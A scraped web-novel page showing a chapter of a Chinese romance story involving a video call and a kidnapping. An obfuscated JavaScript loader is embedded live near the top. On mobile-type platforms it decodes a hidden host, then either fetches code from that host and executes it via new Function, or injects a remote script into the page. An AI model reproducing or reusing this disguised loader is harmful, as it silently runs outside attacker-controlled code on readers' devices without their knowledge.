98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

043底线(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

('043底线

“选哪个呢……”青葱手指掩埋于毛衣袖子中,在五颜六色的甜点图片上游弋,侍者立在一旁耐心等候窗边纠结的少女,桌上的平板正在打开FaceTime连线中,对面气度不凡的少年说了什么。

晚栀翻回前一页:“马卡龙?”

“很像你高中时的一件衣服。”

“……嗯?”高中?视线停在某个粉红马卡龙上……

马卡龙,少女的酥胸。

耳机那头的低笑饱含另一番兴味,不用他解释,菜单被大力合上。

“Excuse me!”晚栀转头随便点了份甜甜圈。

侍者微欠身离开,脚步有股欢快的错觉。

“我换风格了。”指尖无意识摩挲颈边的耳机线,“黑色的。”

视线似有若无往下:“好像还有蕾丝……”

奚扬眼眸深深:“你过来。”日渐恢复的某人正在海参崴。

屈服于零下四十的超低温,世界尽头的灯塔没去成,晚栀觉得还是让它待在传说中吧。

她疯狂摇头:“太冷了。”光是低温的想象就足以冲散旖旎的氛围,她搅动刚送上的玛奇朵:“你的后事处理得怎么样。”

曲径通幽内有一茶室,深色的茶具皆光泽沉敛。

“后事?”奚扬正暖壶,轻笑,“快了,会在你Paper完成之前。”

她深呼吸:“Fine!”

小口喝了几口热咖啡,泛白的嘴唇有了点血色。

“Pretty girl。”充满磁性的低语掺杂在电流声里,微不可闻,却让她脸侧不住升起丝丝燥意,装作若无其事地支起一只手撑脸。

如果脸颊泛红,一定是太热了。

那头长指轻点,屏幕无声出现截屏选项。

“要是我爸可以帮忙就好了。”他手上一定有很多数据。

奚扬倒掉暖壶的热水,冷厉的五官于一片氤氲之中,柔和不少:“你写好传过来,我帮你改改。”

“实验数据有点问题……”她再次尝试给她繁忙的父亲发消息,缤纷的甜甜圈送上桌,诱人的香味吸引她的注意力,迫不及待分享给他看,“我随便点的竟然这么好看!还特别香!”

一个红白绿经典的圣诞装点,另一个是龙猫边上的绿叶给灰白的色调点缀不少。

奚扬很配和地点点头:“试试好不好吃。”

她竖起大拇指:“给这家店点赞。”

“下次一起去。”

虽然他知道这是她常去的店,也曾一起在那里度过数个午后,但不是在一桌,有时甚至不是一个楼层。

“如果你不让服务员买苏打水的话。”

她调侃他在甜品店的光辉事迹,虽然他不觉得。

“我会记得Please。”长手一倾,茶水应声而落,“还有Tips。”

几年前的小插曲两人倒是都记得,两人相视而笑。

她静静观赏那边泡茶,一边品尝桌上的两只甜甜圈。

手机传来非常官方的回复,晚栀百无聊赖地滑动聊天记录喃喃自语:“神龙见首不见尾。”

提起这个时,他准备喝泡好的茶:“你父亲现在很安全。”

嗯,水温稍高。

如此笃定。

她对父亲大人参与国际项目有所耳闻,不过……晚栀见他神神在在:“你早知道了。”

“未雨绸缪,不是吗?”他端着茶杯徐徐吹拂,低垂暗含深意的眼眸,“取了实验数据之后先回加州吧。”

晚栀无可无不可地点头,微微挑眉道谢:“谢了。”

一饮而尽,薄唇紧抿:“不谢。”

“Hilary?”惊讶的呼声淹没在热情高涨的舞池里。

“Hilary是我十六岁以前的称呼,Cherry是我给自己取的名字。”她笑得陶醉,长睫之下棕色的眸子闪着暧昧的光,“多么撩人心弦的Stripper name。”

晚栀笑出声,多肆意的人呐。

由于刚挂掉管家的电话,另一方第十几次的呼叫终于引起Cherry的注意,也有点累了,拉晚栀出来坐到一旁。

接电话的声音包含着张扬的笑意,微扬的尾音充满风情:“Hello?”

“晚栀呢?听说她回加州了?”

“和我一起。”

“为什么屏蔽我?”

“你也删过奚扬的电话。”

不同于他单纯的姊妹情谊,兰瑟知道她的心思:“他竟然对你这么放心?”

“因为我会在乎,又不会让她知道。”Cherry笑声婉转,这一丝婉约神态在她身上是极少见的,“这一点多好利用啊。”

“让我跟晚栀说说话。”

“嗯……嗯?”Cherry环视一圈没看到人影,紧抿嘴唇,“我想现在不行。”

某一包厢内。

绑匪只守在一旁,被绑架的人反倒有那份自觉:“这个绳子是拿来做摆设的?”

熟悉的声音从后方出来:“弄伤了有人会心疼。”

晚栀勾唇,是位故人呢。

直起的背靠回去:“好久不见。”

“倒是和他越来越像了。”奚晟身穿一身白色休闲装,“不意外?”

“看看这张搞事的脸。”

“不怕我把你怎么样?”

“你会吗?”

“也是,要搞事有更好的玩法。”奚晟摩挲下巴,比起其他烂俗的苦情戏码,有什么比让虞晚栀永远恨他更刺激的呢。

奚晟一直好吃好喝地供着,晚栀虽然摸不清他要干什么,但她知道这是在等奚扬,或者……那个峰会的日子。

直到有一天,她被蒙住双眼带上车,去了一个很远的地方,期间听到海水的腥咸味,应该是在一艘船上。

奚晟临走前,给她留了个恶俗的选择题。

“隔壁那艘游轮上有你父亲,至于我老弟,自然正赶往这里来救你。”缓慢的语速带着手握胜券的悠闲。

广播里的风声很大,晚栀偏过头:“二选一?”

“真聪明。”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间